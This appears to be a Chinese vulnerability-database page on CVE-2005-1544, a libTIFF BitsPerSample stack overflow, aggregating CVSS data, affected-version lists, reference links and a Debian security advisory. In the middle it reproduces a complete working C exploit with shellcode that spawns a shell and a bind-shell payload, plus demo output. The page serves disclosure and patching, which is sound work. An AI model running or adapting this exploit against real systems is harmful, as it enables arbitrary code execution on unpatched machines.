CVE-2005-1544
CVSS7.5
发布时间 :2005-05-14 00:00:00
修订时间 :2010-03-05 00:33:44
NMCOEPS    

[原文]Stack-based buffer overflow in libTIFF before 3.7.2 allows remote attackers to execute arbitrary code via a TIFF file with a malformed BitsPerSample tag.


[CNNVD]LibTIFF TIFFOpen缓冲区溢出漏洞(CNNVD-200505-1027)

        libTIFF的3.7.2之前版本存在基于栈的缓冲区溢出,远程攻击者可以通过一个含有缺陷的BitsPerSample标签的TIFF文件来执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:libtiff:libtiff:3.5.5LibTIFF 3.5.5
cpe:/a:libtiff:libtiff:3.7.0LibTIFF 3.7.0
cpe:/a:libtiff:libtiff:3.5.3LibTIFF 3.5.3
cpe:/a:libtiff:libtiff:3.7.1LibTIFF 3.7.1
cpe:/a:libtiff:libtiff:3.5.2LibTIFF 3.5.2
cpe:/a:libtiff:libtiff:3.4LibTIFF 3.4
cpe:/a:libtiff:libtiff:3.6.1LibTIFF 3.6.1
cpe:/a:libtiff:libtiff:3.6.0LibTIFF 3.6.0
cpe:/a:libtiff:libtiff:3.5.7LibTIFF 3.5.7
cpe:/a:libtiff:libtiff:3.5.6LibTIFF 3.5.6
cpe:/a:libtiff:libtiff:3.5.4LibTIFF 3.5.4
cpe:/a:libtiff:libtiff:3.5.1LibTIFF 3.5.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1544
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1544
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1027
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/20533
(PATCH)  XF  libtiff-bitspersample-bo(20533)
http://bugs.gentoo.org/show_bug.cgi?id=91584
(PATCH)  MISC  http://bugs.gentoo.org/show_bug.cgi?id=91584
http://www.gentoo.org/security/en/glsa/glsa-200505-07.xml
(UNKNOWN)  GENTOO  GLSA-200505-07
http://secunia.com/advisories/15320
(UNKNOWN)  SECUNIA  15320
http://bugzilla.remotesensing.org/show_bug.cgi?id=843
(UNKNOWN)  MISC  http://bugzilla.remotesensing.org/show_bug.cgi?id=843
http://www.ubuntu.com/usn/usn-130-1
(UNKNOWN)  UBUNTU  USN-130-1
http://www.securityfocus.com/bid/13585
(UNKNOWN)  BID  13585
http://www.osvdb.org/16350
(UNKNOWN)  OSVDB  16350
http://www.mandriva.com/security/advisories?name=MDKSA-2006:042
(UNKNOWN)  MANDRIVA  MDKSA-2006:042
http://www.debian.org/security/2005/dsa-755
(UNKNOWN)  DEBIAN  DSA-755
http://securitytracker.com/id?1013944
(UNKNOWN)  SECTRACK  1013944
http://secunia.com/advisories/18943
(UNKNOWN)  SECUNIA  18943
http://secunia.com/advisories/18289
(UNKNOWN)  SECUNIA  18289
http://secunia.com/advisories/16872
(UNKNOWN)  SECUNIA  16872
ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.34/SCOSA-2005.34.txt
(UNKNOWN)  SCO  SCOSA-2005.34
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.3/SCOSA-2006.3.txt
(UNKNOWN)  SCO  SCOSA-2006.3

- 漏洞信息

LibTIFF TIFFOpen缓冲区溢出漏洞
高危 缓冲区溢出
2005-05-14 00:00:00 2005-10-20 00:00:00
远程  
        libTIFF的3.7.2之前版本存在基于栈的缓冲区溢出,远程攻击者可以通过一个含有缺陷的BitsPerSample标签的TIFF文件来执行任意代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1554)

LibTiff 3.7.1 (BitsPerSample Tag) Local Buffer Overflow Exploit (EDBID:1554)
multiple local
2006-03-05 Verified
0 Agustin Gianni
N/A [点击下载]
/*
 LibTIFF exploit
 Tested on LibTIFF 3.7.1
 Coded by Agustin Gianni (agustingianni at gmail.com) and Samelat

 Blog: http://gruba.blogspot.com
  
 In other versions and/or Linux distributions you might need to
 adjust some offsets.

 gr00vy@kenny:/home/gr00vy/EXPLOIT$ make libtiff_exploit
 cc libtiff_exploit.c -o libtiff_exploit
 gr00vy@kenny:/home/gr00vy/EXPLOIT$ ./libtiff_exploit /usr/local/bin/tiffinfo evil.tiff
 Using RET: 0xbfffffb4
 TIFFReadDirectory:
 Warning, evil.tiff: unknown field with tag 260 (0x104) encountered.
 evil.tiff:
 Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1); tag trimmed.
 evil.tiff:
 Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed.
 sh-3.00$

 gr00vy@kenny:/home/gr00vy/storage/Exploits/Libtiff-3.7.1$ ./libtiff_exploit
 /usr/kde/3.3/bin/konqueror evil.tiff
 Linux Enabled
 Using RET: 0xbfffffb1
 konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider
 konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider
 TIFFReadDirectory: Warning, : unknown field with tag 260 (0x104) encountered.
 : Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1);
 tag
 trimmed.
 : Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed.
 sh-3.00$ exit
 exit

 Heheh it also works like a remote exploit i would leave that work (easy work) for the
 "interested" people.

*/

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define OFFSET 0x3F /* return address offset */
#define SHELL_OFFSET 0x0102 /* shellcode address offset */
#define DISPLAY "DISPLAY=:0.0" /* no comments ... */
#define HOMEDIR "HOME=/tmp/"

int
main(int argc, char **argv, char **env)
{
 /* Linux shellcode that binds a shell on port 4369 */
char linux_bind[] = "\x31\xc0\x50\x40\x50\x40\x50\xb0\x66\x31"
  "\xdb\x43\x89\xe1\xcd\x80\x99\x52\x52\x52"
  "\xba\x02\x01\x11\x11\xfe\xce\x52\x89\xe2"
  "\x31\xc9\xb1\x10\x51\x52\x50\x89\xc2\x89"
  "\xe1\xb0\x66\xb3\x02\x89\xe1\xcd\x80\xb0"
  "\x66\xb3\x04\x53\x52\x89\xe1\xcd\x80\x31"
  "\xc0\x50\x50\x52\x89\xe1\xb0\x66\xb3\x05"
  "\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f"
  "\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f"
  "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51"
  "\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

 /* (?) lies lies lies lies!*/
 #ifdef FREEBSD
 printf("FreeBSD Enabled\n");
 char shellcode[]=
  "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd"
  "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23";
 
 #else
 printf("Linux Enabled\n");
 char shellcode[] =
  "\xeb\x20\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c"
  "\x88\x46\x07\x8d\x56\x0c\x8d\x4e\x08\x89\xf3"
  "\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\xb0\x01\xcd"
  "\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f"
  "\x73\x68\x23";
 
 #endif

 if(argc < 3)
 {
  fprintf(stderr, "Error, arguments are like these\n"
    "%s <path_to_vuln> <eviltiff.tiff>\n", argv[0]);
  return -1;
 }
 
 char *envp[] = {HOMEDIR, DISPLAY, shellcode, NULL};
 
 /* argv[1] -> executable file that is linked with vuln tiff library */
 long ret = 0xc0000000 - sizeof(void *) - strlen(argv[1]) - strlen(shellcode) - 0x02;
 
 int fd = open(argv[2], O_RDWR);
 if(fd == -1)
 {
  perror("open()");
  return -1;
 }
 
 if(lseek(fd, OFFSET, SEEK_SET) == -1)
 {
  perror("lseek()");
  close(fd);
  return -1;
 }
 
 if(write(fd, (void *) &ret, sizeof(long)) < sizeof(long))
 {
  perror("write()");
  close(fd);
  return -1;
 }
 
 close(fd);
 
 fprintf(stdout, "Using RET: 0x%.8x\n", (unsigned int) ret);
 
 if(execle(argv[1], "tiff", argv[2], NULL, envp) == -1)
 {
  perror("execve()");
  return -1;
 }
 
 return 0;
}

// milw0rm.com [2006-03-05]
		

- 漏洞信息 (F38671)

Debian Linux Security Advisory 755-1 (PacketStormID:F38671)
2005-07-14 00:00:00
Debian  security.debian.org
advisory,overflow,arbitrary
linux,debian
CVE-2005-1544
[点击下载]

Debian Security Advisory DSA 755-1 - Frank Warmerdam discovered a stack-based buffer overflow in libtiff, the Tag Image File Format library for processing TIFF graphics files that can lead to the executionof arbitrary code via malformed TIFF files.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 755-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
July 13th, 2005                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : tiff
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID         : CAN-2005-1544
Debian Bug     : 309739

Frank Warmerdam discovered a stack-based buffer overflow in libtiff,
the Tag Image File Format library for processing TIFF graphics files
that can lead to the executionof arbitrary code via malformed TIFF
files.

For the old stable distribution (woody) this problem has been fixed in
version 3.5.5-7

For the stable distribution (sarge) this problem has been fixed in
version 3.7.2-3.

For the unstable distribution (sid) this problem has been fixed in
version 3.7.2-3.

We recommend that you upgrade your libtiff packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/t/tiff/tiff_3.5.5-7.dsc
      Size/MD5 checksum:      623 fdb202eb01852d3aab26758f5f9a50ce
    http://security.debian.org/pool/updates/main/t/tiff/tiff_3.5.5-7.diff.gz
      Size/MD5 checksum:    37270 3e154325390b0446bee083a7470adaac
    http://security.debian.org/pool/updates/main/t/tiff/tiff_3.5.5.orig.tar.gz
      Size/MD5 checksum:   693641 3b7199ba793dec6ca88f38bb0c8cc4d8

  Alpha architecture:

    http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_alpha.deb
      Size/MD5 checksum:   141498 f0d74c745fc5f75016e190f7c9af0604
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_alpha.deb
      Size/MD5 checksum:   105544 ff3fe1edd72064a3cec25578decb4ce8
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_alpha.deb
      Size/MD5 checksum:   423258 d26ce2a8049612b29c4736f341930439

  ARM architecture:

    http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_arm.deb
      Size/MD5 checksum:   117004 f1c9aafcdaae7148cdb5f13e1805ded5
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_arm.deb
      Size/MD5 checksum:    90842 e13019cb16071175cc0b88526d6dc28a
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_arm.deb
      Size/MD5 checksum:   404308 162fe09877bf4e31044ad2c1c16983bf

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_i386.deb
      Size/MD5 checksum:   112070 9351594ccf87495bc0ec6fb3624d9983
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_i386.deb
      Size/MD5 checksum:    81468 76f340590aa4a0546d810a7e7c7691a8
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_i386.deb
      Size/MD5 checksum:   386938 25f47760934bf3abdf6aa5ac60a0bf84

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_ia64.deb
      Size/MD5 checksum:   158806 0a4abf7ed300b3c33a2e590caa3dd2c1
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_ia64.deb
      Size/MD5 checksum:   135786 341bf0f708522080b931e89a87b598a6
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_ia64.deb
      Size/MD5 checksum:   446574 126ed5be544a1eefe30228d06db9e219

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_hppa.deb
      Size/MD5 checksum:   128298 db87d7cbeb3620736f8cabb0286f831e
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_hppa.deb
      Size/MD5 checksum:   107142 515937e00c5a75f3efa61749a8c8cf58
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_hppa.deb
      Size/MD5 checksum:   420334 0f55b4124cd813964a438403f1253582

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_m68k.deb
      Size/MD5 checksum:   107324 33229624caf61822d6cf77e90872c6f9
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_m68k.deb
      Size/MD5 checksum:    80132 4d4279969b7526649874eb657accc2b1
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_m68k.deb
      Size/MD5 checksum:   380204 68a43fac8f06c48d38ddffc058c7242c

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_mips.deb
      Size/MD5 checksum:   124008 20f911e6540aa69fc85fd07567fe4697
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_mips.deb
      Size/MD5 checksum:    88202 7d68f62089e9546c06d9ffa80e7b0a74
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_mips.deb
      Size/MD5 checksum:   410562 5fa6371f247618b5522ff51259ba35b2

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_mipsel.deb
      Size/MD5 checksum:   123504 ba3102303df4d1cbde4303a00e3428ed
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_mipsel.deb
      Size/MD5 checksum:    88530 c1f77d45cda72501d85607ea50f5a4b2
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_mipsel.deb
      Size/MD5 checksum:   410766 3e3a11a28bc4f1f8081b77e5c72000b0

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_powerpc.deb
      Size/MD5 checksum:   116072 045e7bbd3d4dfb9dc75268435aa62794
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_powerpc.deb
      Size/MD5 checksum:    89824 3e7d286752e28fea6769936695e097d8
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_powerpc.deb
      Size/MD5 checksum:   402420 876d140d9752aaea30cb4cd7f9a38cb2

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_s390.deb
      Size/MD5 checksum:   116924 380141ee69a4a10201efc66182fe5616
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_s390.deb
      Size/MD5 checksum:    92150 762a64a6166aa720fcbf5430a26760cf
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_s390.deb
      Size/MD5 checksum:   395362 228596854105753bc1a0139bc6e1fef0

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/t/tiff/libtiff-tools_3.5.5-7_sparc.deb
      Size/MD5 checksum:   132902 65969fd417aa734f6299c0f35f15dff9
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g_3.5.5-7_sparc.deb
      Size/MD5 checksum:    88982 e674bafc1f1df1617b70f4184051da79
    http://security.debian.org/pool/updates/main/t/tiff/libtiff3g-dev_3.5.5-7_sparc.deb
      Size/MD5 checksum:   397132 e1ebfa6cdfec77c9c643f494e72d0714


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFC1QeAW5ql+IAeqTIRAg3QAKCrXnTEx6QLUi/GycstXUwiTl4BdQCfX885
ECPeLU0ufeSouPHXHVi0TME=
=eI3i
-----END PGP SIGNATURE-----

    

- 漏洞信息

16350
LibTIFF BitsPerSample Tag Overflow
Input Manipulation
Loss of Integrity
Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-05-05 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

LibTIFF TIFFOpen Buffer Overflow Vulnerability
Boundary Condition Error 13585
Yes No
2005-05-10 12:00:00 2007-03-07 11:45:00
Discovery credited to Tavis Ormandy.

- 受影响的程序版本

Turbolinux Turbolinux Workstation 8.0
Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Server 8.0
Turbolinux Turbolinux Server 7.0
Turbolinux Turbolinux Desktop 10.0
Turbolinux Turbolinux 10 F...
Turbolinux Home
Turbolinux Appliance Server Workgroup Edition 1.0
Turbolinux Appliance Server Hosting Edition 1.0
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
SuSE SUSE Linux Enterprise Server 7
+ Linux kernel 2.4.19
SCO Unixware 7.1.4
SCO Open Server 6.0
SCO Open Server 5.0.7
SCO Open Server 5.0.6
S.u.S.E. SuSE eMail Server III
S.u.S.E. SuSE eMail Server 3.1
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Linux Professional 8.2
S.u.S.E. Linux Professional 7.3
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Openexchange Server
S.u.S.E. Linux Office Server
S.u.S.E. Linux IMAP Server 1.0
S.u.S.E. Linux Enterprise Server for S/390 9.0
S.u.S.E. Linux Enterprise Server for S/390
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux Database Server 0
S.u.S.E. Linux Connectivity Server
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
S.u.S.E. Linux 7.3 sparc
S.u.S.E. Linux 7.3 ppc
S.u.S.E. Linux 7.3 i386
S.u.S.E. Linux 7.3
S.u.S.E. Linux 7.2 i386
S.u.S.E. Linux 7.2
S.u.S.E. Linux 7.1 x86
S.u.S.E. Linux 7.1 sparc
S.u.S.E. Linux 7.1 ppc
S.u.S.E. Linux 7.1 alpha
S.u.S.E. Linux 7.1
S.u.S.E. Linux 7.0 sparc
S.u.S.E. Linux 7.0 ppc
S.u.S.E. Linux 7.0 i386
S.u.S.E. Linux 7.0 alpha
S.u.S.E. Linux 7.0
S.u.S.E. Linux 6.4 ppc
S.u.S.E. Linux 6.4 i386
S.u.S.E. Linux 6.4 alpha
S.u.S.E. Linux 6.4
S.u.S.E. Linux 6.3 ppc
S.u.S.E. Linux 6.3 alpha
S.u.S.E. Linux 6.3
S.u.S.E. Linux 6.2
S.u.S.E. Linux 6.1 alpha
S.u.S.E. Linux 6.1
S.u.S.E. Linux 6.0
S.u.S.E. Linux 5.3
S.u.S.E. Linux 5.2
S.u.S.E. Linux 5.1
S.u.S.E. Linux 5.0
S.u.S.E. Linux 4.4.1
S.u.S.E. Linux 4.4
S.u.S.E. Linux 4.3
S.u.S.E. Linux 4.2
S.u.S.E. Linux 4.0
S.u.S.E. Linux 3.0
S.u.S.E. Linux 2.0
S.u.S.E. Linux 1.0
Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 2.1 x86_64
MandrakeSoft Corporate Server 2.1
LibTIFF LibTIFF 3.7.2
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
LibTIFF LibTIFF 3.7.1
LibTIFF LibTIFF 3.7
+ Slackware Linux 10.0
+ Slackware Linux -current
LibTIFF LibTIFF 3.6.1
+ Gentoo Linux 1.4
+ Gentoo Linux
+ OpenPKG OpenPKG Current
+ Turbolinux Turbolinux Server 10.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
LibTIFF LibTIFF 3.6 .0
LibTIFF LibTIFF 3.5.7
LibTIFF LibTIFF 3.5.5
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
LibTIFF LibTIFF 3.5.4
LibTIFF LibTIFF 3.5.3
LibTIFF LibTIFF 3.5.2
LibTIFF LibTIFF 3.5.1
LibTIFF LibTIFF 3.4

- 漏洞讨论

LibTIFF is prone to a buffer-overflow vulnerability. The issue occurs in the 'TIFFOpen()' function when malformed TIFF files are opened. Successful exploitation could lead to arbitrary code execution.

- 漏洞利用

An exploit by Agustin Gianni <agustingianni@gmail.com> and Samelat is available.

- 解决方案

Please see the referenced vendor advisories for further information on obtaining and applying the appropriate updates.


LibTIFF LibTIFF 3.4

LibTIFF LibTIFF 3.5.1

LibTIFF LibTIFF 3.5.2

LibTIFF LibTIFF 3.5.3

LibTIFF LibTIFF 3.5.4

LibTIFF LibTIFF 3.5.5

LibTIFF LibTIFF 3.6 .0

LibTIFF LibTIFF 3.6.1

LibTIFF LibTIFF 3.7

LibTIFF LibTIFF 3.7.1

SCO Unixware 7.1.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站